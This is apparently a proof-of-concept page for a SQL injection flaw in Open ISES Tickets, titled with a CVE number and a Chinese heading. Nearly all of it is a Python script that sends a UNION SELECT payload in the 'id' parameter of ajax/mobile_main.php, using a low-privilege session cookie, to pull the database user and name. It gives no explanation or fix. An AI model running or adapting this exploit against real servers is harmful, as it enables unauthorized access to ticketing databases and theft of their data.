CVE-2026-48238 Open ISES Tickets SQL注入漏洞

import requests # Target URL example url = "http://target/ajax/mobile_main.php" # The vulnerable parameter is 'id'. The application concatenates it into a SELECT statement. # Example payload to extract database user (assuming MySQL) payload = "1' UNION SELECT NULL, user(), database(), NULL-- -" # Authenticated session cookies (Low privilege required) cookies = { "PHPSESSID": "valid_low_priv_session_id" } params = { "id": payload } try: response = requests.get(url, params=params, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully") print("[+] Response content:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except requests.RequestException as e: print(f"[!] An error occurred: {e}")